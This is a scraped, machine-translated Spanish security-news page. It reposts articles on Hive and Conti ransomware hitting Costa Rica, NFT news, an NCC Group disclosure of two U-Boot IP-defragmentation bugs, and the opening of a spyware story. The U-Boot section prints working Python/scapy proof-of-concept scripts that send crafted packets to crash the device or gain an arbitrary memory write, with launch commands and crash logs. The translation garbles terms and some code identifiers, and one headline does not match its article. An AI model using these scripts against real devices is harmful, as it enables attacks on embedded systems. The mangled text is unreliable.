Connect with us
https://cybersecuritynews.site/wp-content/uploads/2021/11/zox-leader.png

Published

on

The Ultimate Managed Hosting Platform

El servicio de salud nacional de Costa Rica fue pirateado esta mañana por un grupo de ransomware ruso conocido como Colmena. La intrusión se produce pocas semanas después. el presidente costarricense rodrigo chaves declaró el estado de emergencia en respuesta a un ataque de rescate de conocimiento de una pandilla rusa especial de ransomware: Conti. Los especialistas en ransomware dicen que podría ser una buena razón considerar que los mismos ciberdelincuentes están detrás de ambos ataques, y que Hive ha estado ayudando a cambiar la marca de Conti y evadir sanciones internacionales que se centran en pagos de extorsión a los ciberdelincuentes que trabajan en Rusia.

La publicación costarricense CRprensa.com revisiones que afectaron las técnicas en el Caja Costarricense del Seguro Social (CCSS) fueron desconectados en la mañana del 31 de mayo, pero el alcance de la violación aún no estaba claro. La CCSS es responsable del sector de bienestar público de Costa Rica, y las contribuciones de los empleados y empleadores son obligatorias por ley.

Las consecuencias de este último ataque aún no son claras, pero es probable que sean perturbadoras: una señal escrita a mano publicada fuera de un centro de salud pública en Costa Rica indicó de inmediato que ambos sistemas están inactivos hasta que se descubra más (debido a @Xyb3rb3nd3r por compartir esta foto).

Un aviso escrito a mano publicado afuera de una clínica de salud pública en Costa Rica advirtió sobre cortes en el sistema debido a un ataque cibernético a los sistemas de salud del país.

Una réplica del aviso de rescate dejado por los intrusos y subsecuentemente subido a Virustotal.com significa que la intrusión de CCSS fue obra de Hive, que generalmente exige el costo de una clave digital necesaria para desbloquear archivos y servidores comprometidos por el ransomware del grupo.

Una página de chat del ransomware HIVE para un paciente en particular (redactado).

El 8 de mayo, el presidente Chaves aprovechó su primer día en la oficina para declarar el estado de emergencia nacional luego de que el grupo de ransomware Conti amenazara con publicar gigabytes de datos confidenciales robados al Ministerio de Hacienda de Costa Rica y otras empresas gubernamentales. Conti exigió inicialmente $10 millones, y luego duplicó la cantidad cuando Costa Rica se negó a pagar. El 20 de mayo, Conti filtró más de 670 gigabytes de datos extraídos de los servidores del gobierno costarricense.

Como CyberScoop informado el 17 de mayo, Chaves dijo a los medios locales que creía que los colaboradores dentro de Costa Rica estaban sirviendo para que Conti extorsionara al gobierno. Chaves no proporcionó información que respalde esta afirmación, pero se está analizando la línea de tiempo del descenso de Conti en Costa Rica.

La mayoría de las comunicaciones públicas de Conti sobre el asalto en Costa Rica asignan muy claramente el crédito por la intrusión a una persona o grupo que se hace llamar “unc1756”. En marzo de 2022, un nuevo consumidor con el mismo título se registró en el foro de discusión sobre delitos en idioma ruso Exploit.

Un mensaje que Conti publicó en su oscuro blog de Internet el 20 de mayo.

En la noche del 18 de abril, el Ministerio de Hacienda de Costa Rica reveló la intrusión de Conti a través de Twitter. Más temprano ese mismo día, el usuario unc1756 publicó un anuncio de ayuda necesaria en Exploit diciendo que estaban tratando de comprar el acceso a “redes específicas” en Costa Rica.

“Por redes particulares me refiero a algo como Haciendas”, escribió unc1756 en Exploit. El Ministerio de Hacienda de Costa Rica se conoce en español como el “Ministerio Hacienda de Costa Rica”. Unc1756 dijo que pagaría $USD 500 o más por dicha entrada, y trabajaría únicamente con personas de habla rusa.

LA DISTRACCIÓN DEL JUEGO DE NOMBRES

Los expertos dicen que hay indicios de que los abogados de Conti y Hive están colaborando en sus ataques a Costa Rica, y que las intrusiones están vinculadas a un esfuerzo de cambio de marca de Conti. Poco después de que Rusia invadiera Ucrania a fines de febrero, Conti declaró su apoyo total, alineándose directamente con Rusia y contra cualquiera que se opusiera a la madre patria.

El mensaje amenazante de Conti esta semana sobre la injerencia mundial en Ucrania.

Conti eliminó rápidamente la declaración de su sitio web, pero el daño ya se había hecho, y cualquier favor o estima que Conti se hubiera ganado entre los ciberdelincuentes ucranianos clandestinos se evaporó con éxito en un solo día.

Poco tiempo después, un profesional de seguridad ucraniano filtró muchos meses de registros de chat internos entre el personal de Conti mientras planeaban y ejecutaban ataques contra miles de organizaciones de víctimas. Estos mensajes sinceros descubiertos cómo es trabajar para Conti, cómo socavaron la seguridad de sus objetivosademás de cómo los líderes del grupo crearon estrategias para obtener la ventaja en las negociaciones de rescate.

Sin embargo, la declaración de solidaridad de Conti con el Kremlin lo hizo cada vez más ineficaz como instrumento de extorsión económica. De acuerdo con la agencia de inteligencia cibernética ADVIntella alianza de Conti con el estado ruso pronto lo dejó en gran medida incapaz de obtener fondos de rescate porque se sugirió a las empresas afectadas que pagar una demanda de rescate de Conti podría significar violar las sanciones económicas de EE. UU. a Rusia.

“Conti como modelo se volvió relacionado con el estado ruso, un estado que actualmente está enfrentando sanciones excesivas”, escribió ADVIntel en un extenso analisis (PDF). “A los ojos del estado, cada pago de rescate destinado a Conti podría haber ido a parar a una persona bajo sanción, convirtiendo la extorsión de datos fácil en una violación de la ley de la OFAC y las políticas de sanción contra Rusia”.

Conti es probablemente, con mucho, el grupo de ransomware más agresivo y valioso en funcionamiento actualmente. Imagen: Chainalysis

ADVIntel dice que se enteró por primera vez de la intrusión de Conti en los sistemas del gobierno costarricense el 14 de abril, y que ha visto comunicaciones internas de Conti que indican que el objetivo no era cobrar en el ataque a Costa Rica.

De alguna manera, argumenta ADVIntel, Conti simplemente lo estaba utilizando como un método para mostrar públicamente que todavía estaba funcionando como el grupo de ransomware más rentable del mundo, cuando en realidad el liderazgo central de Conti estaba ocupado desmantelando el grupo criminal y dividiéndose a sí mismos y a sus principales asociados en otros. equipos de ransomware que ya están en conversaciones agradables con Conti.

“La única razón por la que Conti había tenido que cumplir con este último ataque era usar la plataforma como una herramienta de publicidad, realizando su propia desaparición y posterior renacimiento de la manera más creíble que podría haber sido concebida”, concluyó ADVIntel.

ADVIntel dice que los líderes y socios principales de Conti se están dispersando a varios colectivos delictivos leales a Conti que usan casilleros de ransomware o interactúan estrictamente en el robo de datos a cambio de rescate, incluidos AlphV/BlackCat, AvosLocker, BlackByte, HelloKitty, Hive y Karakurt.

Sin embargo, Hive parece ser quizás el mayor beneficiario de cualquier desgaste de Conti: dos veces durante la semana pasada, tanto Conti como Hive reclamaron el deber de piratear las mismas empresas. Cuando la discrepancia fue llamado en TwitterHive actualizó su sitio web para afirmar que no estaba afiliado a Conti.

Las hazañas costarricenses de Conti y Hive marcan el último de una serie de ataques cibernéticos recientes contra objetivos del gobierno en toda América Latina. Al mismo tiempo que hackeó Costa Rica en abril, Conti anunció que había hackeado la red de Perú. Dirección Nacional de Inteligenciaamenazando con publicar información delicada robada si el gobierno federal no pagaba un rescate.

Sin embargo, Conti y Hive no deberían centrarse solos en las víctimas latinoamericanas de los últimos tiempos. De acuerdo con la información recopilada de los blogs que avergüenzan a las víctimas mantenidos por varios equipos de ransomware, durante los últimos 90 días los agentes de rescate han pirateado y tratado de extorsionar a 15 empresas gubernamentales en Brasil, 9 en Argentina, seis en Colombia, 4 en Ecuador y tres en Chile.

un último reporte (PDF) por el Banco Interamericano de Crecimiento sugiere que muchos países latinoamericanos carecen de la experiencia técnica o las normas legales de ciberdelincuencia para hacer frente a las amenazas y los actores amenazantes de inmediato.

“Esta investigación revela que el área de América Latina y el Caribe (ALC) no estará lo suficientemente preparada para hacer frente a los ataques cibernéticos”, explica el documento del BID. “Solo 7 de las 32 ubicaciones internacionales estudiadas tienen un plan de seguridad de infraestructura vital, mientras que 20 han establecido grupos de respuesta a incidentes de ciberseguridad, generalmente denominados CERT o CSIRT. Esto limita su capacidad para determinar y responder a las agresiones”.



The Ultimate Managed Hosting Platform

Source link

Continue Reading

Ultimas noticias

El proveedor de liquidez de Ethereum XCarnival negocia la devolución del 50% de ETH robado – Lo último en noticias de seguridad cibernética | Actualizaciones de ataques de malware

Published

on

Ethereum liquidity provider XCarnival negotiates return of 50% stolen ETH

The Ultimate Managed Hosting Platform

Noah Davis, el token no fungible (NFT) El especialista de la casa de venta pública Christie’s ha dicho que dejará el lugar en julio para participar como líder modelo de la colección CryptoPunks NFT con Yuga Labs.

anunciando el movimiento el domingo en un hilo de Twitter, Davis pareció sofocar cualquier inquietud que tuvieran los propietarios sobre el futuro de una de las iniciativas NFT más antiguas, diciendo que “no joderá con los punks”.

Invitó a los dueños de casas de CryptoPunk a programar una conversación con él sobre el futuro del desafío en el Evento NFT NYC y dijo que el nuevo lugar no le quitaría nada a su desafío personal de NFT.

Davis es responsable de la venta pública sin precedentes de Everydays: The First 5000 Days NFT de Beeple, que vendido por más de $ 69 millones en marzo de 2021.

laboratorios de yuga adquirió la propiedad intelectual de la colección CryptoPunks de Larva Labs en marzo, diciendo que entregará todos los derechos de propiedad intelectual a los propietarios, una promesa que aún no se ha cumplido.

Sin embargo, el cofundador de Yuga Labs Wylie Aronow alias Gargamel abordó el atraco en una colección de tweets el domingo, escritura era “demasiado importante para apurarse” y que las nuevas palabras “aparecerán en las próximas semanas”.

Con el anuncio de la transferencia de Davis y las nuevas palabras listas para tener impacto pronto, algunas son alegando que los iniciados tenían información previa del conocimiento, citando el creciente volumen de ventas de la reunión.

De acuerdo a Hasta OpenSea, se han producido 39 ventas brutas de la colección CryptoPunks desde el anuncio, con 101 ventas brutas en total el domingo, frente a las 19 ofrecidas el día anterior, el sábado.

Estafadora convicta se “reinventa” a sí misma con NFT

La estafadora y estafadora condenada Anna Sorokin, quien de 2013 a 2017 se hizo pasar por la rica heredera alemana “Anna Delvey” para estafar a conocidos y empresas por más de $ 275,000, comenzó una colección de NFT.

Titulada Reinventing Anna, la colección ofrece 2000 NFT por 0,1 Ether (ETH) cada, o alrededor de $ 110 en el momento de la escritura. Es comercializado como una manera para que los “seguidores trabajen con Anna” y la entrada personal “pregúntame-cualquier cosa” con Sorokin.

Asociado: El volumen de negociación de NFT aumenta en medio de la caída del mercado y el precio mínimo

La reunión contará con 20 “cartas de la versión dorada”, que otorgan a los propietarios la posibilidad de una llamada telefónica individual o una visita en persona con la llamada “famend socialite”.

El nombre de la reunión es un juego de inventando a ana La miniserie dramática de Netflix se lanzó a principios de este año, cuyo tema está basado en la historia de Sorokin.

“Veo esta primera caída como una oportunidad para unirme directamente a mi audiencia y tomar el control de la narrativa que ha estado en gran medida fuera de mi gestión”, escribió Sorokin en una publicación de Instagram sobre la reunión.

Sin embargo, se desconoce cómo los titulares de NFT podrán acudir a ella en persona. Desde marzo de 2021, Sorokin ha estado retenida por el Servicio de Inmigración y Control de Aduanas de los Estados Unidos por quedarse más tiempo que su visa y se enfrenta a la deportación a Alemania.

Seguidores de Duppies enfocados en estafa de phishing

Duppies, un próximo Proyecto Solana NFT del mismo equipo que la serie favorita de “DeGods”, su cuenta de Twitter fue pirateada el sábado, con atacantes tuiteando un hipervínculo a una “menta sigilosa” de los NFT.

El hipervínculo era un sitio web de phishing, y a los clientes que conectaron sus billeteras y trataron de acuñar se les vaciaron todos los fondos de sus billeteras. Un consumidor de Twitter escribió extraviaron 650 Solana (SOL), valorado en alrededor de $18.850, por el asalto.

En las áreas de Twitter después del ataque, el creador de la próxima colección llamado Frank se unió al auditor de seguridad Code Monkey para explique cómo ocurrió el asalto.

El auditor dijo que el atacante probablemente accedió a la cuenta de Twitter de los Duppies en un ataque de intercambio de SIM dirigido.

El ataque funciona cuando los estafadores se ponen en contacto con el proveedor de telefonía móvil del titular del número de teléfono y engañan al proveedor para que intercambie el número de teléfono por una tarjeta SIM de su propiedad. A partir de ahí, el atacante puede eludir cualquier autenticación de dos factores en la cuenta y lograr la entrada.

Información extra ingeniosa

El relojero TAG Heuer ha lanzado un reloj que puede emparejarse con un teléfono inteligente para mostrar NFT en la esfera del reloj y también conéctese con la cadena de bloques para confirmar que el NFT es propiedad del usuario.

A pesar de las advertencias de las autoridades del país, la variedad de NFT y plataformas digitales coleccionables en China ha visto un aumento de cinco veces desde febrero de 2022, pasando de poco más de 100 a más de 500, según medios estatales locales.



The Ultimate Managed Hosting Platform

Source link

Continue Reading

Ultimas noticias

Descubrimiento de 56 fallas de dispositivos OT atribuidas a una cultura de seguridad mediocre: lo último en noticias de seguridad cibernética | Actualizaciones de ataques de malware

Published

on

bug bounty

The Ultimate Managed Hosting Platform

Por Nicolás Bidron y Nicolás Guigo.

[Editor’s note: This is an updated/expanded version of these advisories which we originally published on June 3 2022.]

U-bota es un cargador de arranque popular para sistemas integrados con implementaciones para muchas arquitecturas y destacado en la mayoría de los sistemas integrados basados ​​en Linux como ChromeOS y Android Gadgets.

Se descubrieron dos vulnerabilidades en el algoritmo de desfragmentación de IP realizado en U-Boot, con enlaces a los avisos técnicos relacionados a continuación:

Las pruebas de explotación de ideas y resultados se ofrecen en todos los avisos técnicos a continuación.

Proyecto arranque en U
URL del proyecto https://source.denx.de/u-boot/u-boot
Variaciones afectadas todas las variaciones hasta cometer b85d130ea0cac152c21ec38ac9417b31d41b5552
Técnicas afectadas Todas las técnicas que definen CONFIG_IP_DEFRAG
identificador CVE CVE-2022-30790
URL de asesoramiento Enlace
Amenaza Vital 9.6 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Autores Nicolás Guigo, Nicolás Bidron

Resumen

U-boot es un cargador de arranque popular para sistemas integrados con implementaciones para una gran cantidad de arquitecturas y prominente en la mayoría de los sistemas integrados basados ​​en Linux.

Ubicación

En u-boot/net/net.c la __net_defragment línea de función 900 a 1018.

Impacto

La implementación U-Boot de RFC815 Los ALGORITMOS DE REENSAMBLAJE DE DATOS DE IP son propensos a un ataque de sobrescritura de Gap Descriptor que al final resulta en una primitiva de escritura arbitraria.

Descripción

En versiones compiladas de U-Boot que definen CONFIG_IP_DEFRAG, un valor de ip->ip_len (Longitud total del encabezado del paquete IP) superior a IP_HDR_SIZE y estrictamente inferior a IP_HDR_SIZE+8 conduce a un valor de len comprendido entre 0 y 7. Esto finalmente resulta en una división truncada por 8 dando como resultado un valor de 0, obligando a que los metadatos y el fragmento del agujero apunten a la misma ubicación. El memcpy posterior sobrescribe los metadatos del agujero con los datos del fragmento. A través de un segundo fragmento, estos metadatos controlados por el atacante pueden explotarse para realizar una escritura controlada en un desplazamiento arbitrario.

Este error solo se puede explotar desde la red local, ya que requiere la elaboración de un paquete con formato incorrecto que probablemente se descartaría durante el enrutamiento. Sin embargo, esto se puede aprovechar de manera efectiva para rootear localmente los dispositivos integrados basados ​​en Linux.

static struct ip_udp_hdr *__net_defragment(struct ip_udp_hdr *ip, int *lenp)
{
	static uchar pkt_buff[IP_PKTSIZE] __aligned(PKTALIGN);
	static u16 first_hole, total_len;
	struct hole *payload, *thisfrag, *h, *newh;
	struct ip_udp_hdr *localip = (struct ip_udp_hdr *)pkt_buff;
	uchar *indata = (uchar *)ip;
	int offset8, start, len, done = 0;
	u16 ip_off = ntohs(ip->ip_off);

	/* payload starts after IP header, this fragment is in there */
	payload = (struct hole *)(pkt_buff + IP_HDR_SIZE);
	offset8 =  (ip_off & IP_OFFS);
	thisfrag = payload + offset8;
	start = offset8 * 8;
	len = ntohs(ip->ip_len) - IP_HDR_SIZE;

La última línea del extracto anterior de u-boot/net/net.c muestra cómo el atacante puede controlar el valor de len ser estrictamente inferior a 8 emitiendo un paquete con ip_len Entre 21 y 27 (IP_HDR_SIZE tiene un valor de 20).

También tenga en cuenta que offset8 aquí está 0 lo que lleva a thisfrag = payload.

	} else if (h >= thisfrag) {
		/* overlaps with initial part of the hole: move this hole */
		newh = thisfrag + (len / 8);
		*newh = *h;
		h = newh;
		if (h->next_hole)
			payload[h->next_hole].prev_hole = (h - payload);
		if (h->prev_hole)
			payload[h->prev_hole].next_hole = (h - payload);
		else
			first_hole = (h - payload);

	} else {

Más tarde, en la misma función, la ejecución llega a la ruta del código anterior. Aquí, len / 8 evalúa a 0 llevando a newh = thisfrag. También tenga en cuenta que first_hole aquí está 0 ya que h y payload apuntar al mismo lugar.

	/* finally copy this fragment and possibly return whole packet */
	memcpy((uchar *)thisfrag, indata + IP_HDR_SIZE, len);

En el extracto anterior la llamada a memcpy() sobrescribe los metadatos del agujero (ya que thisfrag y h ambos apuntan a la misma ubicación) con datos arbitrarios de los datos del paquete IP fragmentado. Con un len valor de 6, last_byte, next_holey prev_hole del first_hole todos terminan controlados por el atacante.

Finalmente, la escritura arbitraria se activa mediante el envío de un segundo paquete de fragmentos, cuyo desplazamiento y longitud solo necesitan encajar dentro del agujero al que apuntan los metadatos previamente controlados (next_hole) establecido desde el primer paquete.

Recomendación

Este error se corrigió en la confirmación b85d130ea0cac152c21ec38ac9417b31d41b5552 en la rama maestra de U-Boot. Actualice a la última versión para obtener la solución.

Prueba de Concepto de Explotación y Resultados

Se intentó explotar una compilación de U-Boot para Raspberry Pi 4 con IP_DEFRAG activado. El dispositivo se configuró para intentar cargar el kernel a través de U-Boot dhcp método, esto asegura que los dispositivos obtengan una dirección IP y habiliten su interfaz ethernet, lo que permite que una máquina adyacente en la red (conectada al mismo conmutador) entregue la carga útil maliciosa.

Se utilizó el siguiente script de Python para enviar el primer paquete malicioso que sobrescribirá el paquete inicial. __net_defragment() metadatos de agujero con contenido de una estructura de agujero especialmente diseñada. El segundo paquete ejecutó efectivamente la sobrescritura de memoria en el desplazamiento establecido por el primer paquete. next_holelo que provocó un bloqueo, pero la carga útil se puede ajustar para lograr escrituras de memoria controladas contra el objetivo.

import ctypes
from sys import argv
from scapy.all import *

# struct endianness based on arch
class hole(ctypes.LittleEndianStructure):
  _pack_ = 1
  _fields_ = [('last_byte', ctypes.c_ushort),
              ('next_hole', ctypes.c_ushort),
              ('prev_hole', ctypes.c_ushort),
              ('unused', ctypes.c_ushort)]
  def __init__(self, lb, nh, ph):
    return super().__init__(lb, nh, ph, 0xFEFE)

# U-Boot IP Fragment Hole Overwrite
def frag_hole_overwrite():
  # Prepare the malicious hole
  hh = hole(0x10, 0x07FD, 0xFFFF)
  payload = bytes(hh) + bytes(0x20)
  packet1 = Ether(dst=mac)/IP(dst=ip, flags="MF", frag=0x0, len=27)/Raw(payload)
  packet1.show2()
  sendp(packet1, iface="virbr0")
  # Trigger the unsafe write in the overlap case
  payload = bytes(0x10)
  packet2 = Ether(dst=mac)/IP(dst=ip, flags="MF", frag=0x0)/Raw(payload)
  packet2.show2()
  sendp(packet2, iface="eth0") iface=virbr0 if launched against a qemu instance

if __name__ == '__main__':
  global mac, ip
  mac = argv[1]
  ip = argv[2]
  frag_hole_overwrite()

El script anterior se puede iniciar con el siguiente comando:

> ./fragger_poc.py dc:a6:32:ef:5f:0a 192.168.0.90

Esto dará como resultado lo siguiente (registro como se muestra en la consola de U-Boot):

U-Boot 2022.04-dirty (May 26 2022 - 00:53:40 -0700)

DRAM:  7.1 GiB
RPI 4 Model B (0xd03114)
Core:  202 devices, 13 uclasses, devicetree: board
MMC:   [email protected]: 1, [email protected]: 0
Loading Setting from FAT... Unable to learn "uboot.env" from mmc0:1... 
In:    serial
Out:   vidconsole
Err:   vidconsole
Internet:   eth0: [email protected]
PCIe BRCM: hyperlink up, 5.0 Gbps x1 (SSC)
beginning USB...
Bus xhci_pci: Register 5000420 NbrPorts 5
Beginning the controller
USB XHCI 1.00
scanning bus xhci_pci for gadgets... 2 USB Gadget(s) discovered
       scanning usb for storage gadgets... 0 Storage Gadget(s) discovered
Hit any key to cease autoboot:  0 
change to partitions #0, OK
mmc0 is present machine
Scanning mmc 0:1...
Discovered U-Boot script /boot.scr
146 bytes learn in 9 ms (15.6 KiB/s)
## Executing script at 02400000
[email protected] Ready for PHY auto negotiation to finish. performed
BOOTP broadcast 1
DHCP consumer sure to deal with 192.168.0.90 (23 ms)
*** Warning: no boot file identify; utilizing 'C0A8005A.img'
Utilizing [email protected] machine
TFTP from server 192.168.0.1; our IP deal with is 192.168.0.90
Filename 'C0A8005A.img'.
Load deal with: 0x1000000
Loading: T T T T T T T T "Synchronous Abort" handler, esr 0x8a000000
elr: fffffffff8165fff lr : 00000000000e43a8 (reloc)
elr: 000000000000ffff lr : 0000000007f8e3a8
x0 : 0000000007b9b942 x1 : 000000000000007a
x2 : 0000000000000040 x3 : 000000000000ffff
x4 : 00000000000001ad x5 : 0000000007b2f000
x6 : 0000000000000024 x7 : 0000000000000000
x8 : 000000000000000b x9 : 0000000000000008
x10: 00000000ffffffe0 x11: 0000000000000006
x12: 000000000001869f x13: 0000000007b168cc
x14: 0000000007b18b00 x15: 0000000000000002
x16: 000000000000ffff x17: 2e8324b208000000
x18: 0000000007b25d60 x19: 000000000000007a
x20: 0000000007b2f130 x21: 0000000000000020
x22: 0000000007fcf000 x23: 0000000007fc9000
x24: 0000000007fcb000 x25: 0000000007fc9000
x26: 0000000007fc9628 x27: 0000000007fcf000
x28: 0000000007fcf000 x29: 0000000007b16b40

Code: 4bcbc7cb 46890822 c96a480a b2353b57 (3e972802) 
Resetting CPU ...

resetting ...
Proyecto arranque en U
URL del proyecto https://source.denx.de/u-boot/u-boot
Variaciones afectadas todas las variaciones hasta cometer b85d130ea0cac152c21ec38ac9417b31d41b5552
Técnicas afectadas Todas las técnicas que definen CONFIG_IP_DEFRAG
identificador CVE CVE-2022-30552
URL de asesoramiento Enlace
Amenaza Excesivo 7.1 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
Autores Nicolás Guigo, Nicolás Bidron

Resumen

U-boot es un cargador de arranque popular para sistemas integrados con implementaciones para una gran cantidad de arquitecturas y prominente en la mayoría de los sistemas integrados basados ​​en Linux.

Ubicación

u-boot/net/net.c líneas 915 y 1011.

Impacto

La implementación U-Boot de RFC815 Los ALGORITMOS DE REENSAMBLAJE DE DATOS DE IP son propensos a un desbordamiento de búfer por un datagrama de IP fragmentado diseñado específicamente con un tamaño completo no válido que provoca una denegación de servicio.

Descripción

En versiones compiladas de U-Boot que definen CONFIG_IP_DEFRAG, un valor de ip->ip_len (longitud total del encabezado del paquete IP) inferior a IP_HDR_SIZE lleva a len tomando un valor negativo, lo que finalmente da como resultado un desbordamiento de búfer durante la llamada posterior a memcpy() que usa len como su count parámetro.

Este error solo se puede explotar desde la red local, ya que requiere la elaboración de un paquete con formato incorrecto con un ip_len valor inferior a la longitud total mínima aceptada (21 según se define en el documento de especificación IP: RFC791) que probablemente podría descartarse durante el enrutamiento.

static struct ip_udp_hdr *__net_defragment(struct ip_udp_hdr *ip, int *lenp)
{
	static uchar pkt_buff[IP_PKTSIZE] __aligned(PKTALIGN);
	static u16 first_hole, total_len;
	struct gap *payload, *thisfrag, *h, *newh;
	struct ip_udp_hdr *localip = (struct ip_udp_hdr *)pkt_buff;
	uchar *indata = (uchar *)ip;
	int offset8, begin, len, performed = 0;
	u16 ip_off = ntohs(ip->ip_off);

	/* payload begins after IP header, this fragment is in there */
	payload = (struct gap *)(pkt_buff + IP_HDR_SIZE);
	offset8 =  (ip_off & IP_OFFS);
	thisfrag = payload + offset8;
	begin = offset8 * 8;
	len = ntohs(ip->ip_len) - IP_HDR_SIZE;

La línea final del extracto anterior de u-boot/internet/internet.c muestra el lugar donde el desbordamiento a un adverso len vale la pena si ip_len está dispuesto a un precio estrictamente inferior a 20 (IP_HDR_SIZE siendo 20). Además, diga que dentro del extracto anterior el pkt_buff tampón tiene una medida de CONFIG_NET_MAXDEFRAG que tiene un valor predeterminado de 16 KB; sin embargo, puede variar de 1 KB a 64 KB dependiendo de las configuraciones.

	/* lastly copy this fragment and probably return entire packet */
	memcpy((uchar *)thisfrag, indata + IP_HDR_SIZE, len);

Dentro del extracto anterior el memcpy() desborda el lugar de vacaciones intentando hacer una réplica de prácticamente 4 gigas en un búfer diseñado para llevar CONFIG_NET_MAXDEFRAG bytes como máximo, lo que resulta en un DoS.

Recomendación

Este error se corrigió en la confirmación b85d130ea0cac152c21ec38ac9417b31d41b5552 en la rama maestra de U-Boot. Actualice a la última versión para obtener la solución.

Prueba de Concepto de Explotación y Resultados

Se intentó explotar una compilación de U-Boot para Raspberry Pi 4 con IP_DEFRAG activado. El dispositivo se configuró para intentar cargar el kernel a través de U-Boot dhcp método, esto asegura que los dispositivos obtengan una dirección IP y habiliten su interfaz ethernet, lo que permite que una máquina adyacente en la red (conectada al mismo conmutador) entregue la carga útil maliciosa.

El siguiente script de Python se usa para enviar el único paquete malicioso que se desbordará lenfinalmente desbordando el búfer (thisfrag) y bloquear el dispositivo.

import ctypes
from sys import argv
from scapy.all import *

# U-Boot Fragment Underflow
def frag_underflow():
  packet = Ether(dst=mac)/IP(dst=ip, flags="MF", frag=0x0, len=19)/UDP()
  packet.show2()
  sendp(packet, iface="eth0") # iface=virbr0 if launched against a qemu instance

if __name__ == '__main__':
  global mac, ip
  mac = argv[1]
  ip = argv[2]
  frag_underflow()

El script anterior se puede iniciar con el siguiente comando:

> ./fragger_poc.py dc:a6:32:ef:5f:0a 192.168.0.90

Esto dará como resultado lo siguiente (registro como se muestra en la consola de U-Boot):

U-Boot 2022.04-dirty (May 26 2022 - 00:53:40 -0700)

DRAM:  7.1 GiB
RPI 4 Model B (0xd03114)
Core:  202 devices, 13 uclasses, devicetree: board
MMC:   [email protected]: 1, [email protected]: 0
Loading Setting from FAT... Unable to learn "uboot.env" from mmc0:1... 
In:    serial
Out:   vidconsole
Err:   vidconsole
Internet:   eth0: [email protected]
PCIe BRCM: hyperlink up, 5.0 Gbps x1 (SSC)
beginning USB...
Bus xhci_pci: Register 5000420 NbrPorts 5
Beginning the controller
USB XHCI 1.00
scanning bus xhci_pci for gadgets... 2 USB Gadget(s) discovered
       scanning usb for storage gadgets... 0 Storage Gadget(s) discovered
Hit any key to cease autoboot:  0 
change to partitions #0, OK
mmc0 is present machine
Scanning mmc 0:1...
Discovered U-Boot script /boot.scr
146 bytes learn in 9 ms (15.6 KiB/s)
## Executing script at 02400000
BOOTP broadcast 1
DHCP consumer sure to deal with 192.168.0.90 (18 ms)
*** Warning: no boot file identify; utilizing 'C0A8005A.img'
Utilizing [email protected] machine
TFTP from server 192.168.0.1; our IP deal with is 192.168.0.90
Filename 'C0A8005A.img'.
Load deal with: 0x1000000
Loading: T T T T T T T T T T 
Retry rely exceeded; beginning once more
SCRIPT FAILED: persevering with...
libfdt fdt_check_header(): FDT_ERR_BADMAGIC
MMC Gadget 2 not discovered
no mmc machine at slot 2

Gadget 0: unknown machine
BOOTP broadcast 1
DHCP consumer sure to deal with 192.168.0.90 (21 ms)
*** Warning: no boot file identify; utilizing 'C0A8005A.img'
Utilizing [email protected] machine
TFTP from server 192.168.0.1; our IP deal with is 192.168.0.90
Filename 'C0A8005A.img'.
Load deal with: 0x1000000
Loading: T T T T T T T T "Synchronous Abort" handler, esr 0x96000046
elr: 00000000000e06e8 lr : 00000000000e5174 (reloc)
elr: 0000000007f8a6e8 lr : 0000000007f8f174
x0 : 0000000007fcb51c x1 : 0000000007b75964
x2 : ffffffffffffffff x3 : 0000000000234ae4
x4 : 0000000007fcb51c x5 : 0000000000000000
x6 : 0000000000000000 x7 : 00000000ffffffff
x8 : 0000000000000000 x9 : 0000000000000008
x10: 00000000ffffffe0 x11: 0000000007fcb514
x12: 000000000001869f x13: 0000000007b17d4c
x14: 0000000007b18b00 x15: 0000000000000002
x16: 0000000007f5cc84 x17: 2e8324b208000000
x18: 0000000007b25d60 x19: 0000000007b75942
x20: 0000000007fcb500 x21: 0000000007fa0fd0
x22: 0000000007f98156 x23: 00000000ffffffff
x24: 0000000007fc9000 x25: 0000000000000000
x26: 0000000007fcb514 x27: 0000000007fcb51c
x28: 0000000007b75950 x29: 0000000007b17f30

Code: cb030004 cb030021 17fffff0 38636825 (38236885) 
Resetting CPU ...

resetting ...

18 de mayo de 2022: Correo electrónico inicial de NCC a los mantenedores de U-boot anunciando que se identificaron dos vulnerabilidades. Los mantenedores de U-Boot respondieron indicando que el proceso de divulgación se manejará públicamente a través de la lista de correo de U-Boot.

18 de mayo de 2022: NCC publicó un informe completo de las dos vulnerabilidades identificadas en la lista de correo pública de U-Boot.

25 de mayo de 2022: un mantenedor de U-Boot indicó en la lista de correo que implementará una solución a los dos hallazgos.

26 de mayo de 2022: Los mantenedores de U-Boot han propuesto un parche para corregir ambos CVE a través de la lista de correo.

31 de mayo de 2022: Los mantenedores de U-boot y NCC Group acuerdan publicar los avisos antes de la implementación del parche, dada la discusión pública basada en la lista de correo sobre la vulnerabilidad y las soluciones propuestas.

3 de junio de 2022: La corrección está comprometida con la rama maestra de U-Boot https://source.denx.de/u-boot/u-boot/-/commit/b85d130ea0cac152c21ec38ac9417b31d41b5552

Jennifer Fernick y Dave Goldsmith por su apoyo durante el proceso de divulgación.

Los mantenedores de U-Boot.

Autores

Nicolás Guigo y Nicolás Bidron

The Ultimate Managed Hosting Platform

Source link

Continue Reading

Ultimas noticias

Gobierno de Kazajstán Software espía usado contra manifestantes

Published

on

Kazakh Govt. Used Spyware Against Protesters

The Ultimate Managed Hosting Platform

Los investigadores descubrieron que una entidad del gobierno de Kazajstán desplegó sutiles programas publicitarios italianos dentro de sus fronteras.

Un agente del gobierno de Kazajstán ha estado utilizando adware de nivel empresarial contra objetivos domésticos, según el análisis de Lookout. publicado Semana final.

La entidad del gobierno federal utilizó la suplantación de identidad modelo para engañar a las víctimas para que descargaran el malware, denominado “Ermitaño”. Hermit es un sofisticado programa modular desarrollado por RCS Lab, una infame firma italiana que se especializa en vigilancia digital. Tiene la capacidad de realizar todo tipo de espionaje en el teléfono de un objetivo, no solo para obtener información, sino también para informar y realizar llamadas.

El momento de esta operación de espionaje tiene un significado adicional. En la primera semana de 2022, las protestas antigubernamentales se enfrentaron a represiones violentas en todo Kazajistán. En total murieron 227 personas y casi 10.000 fueron detenidas. 4 meses después es cuando los investigadores encontraron las muestras más nuevas de Ermitaño haciendo rondas.

la intrusión

¿Cómo se consigue un objetivo para obtener su propio adware?

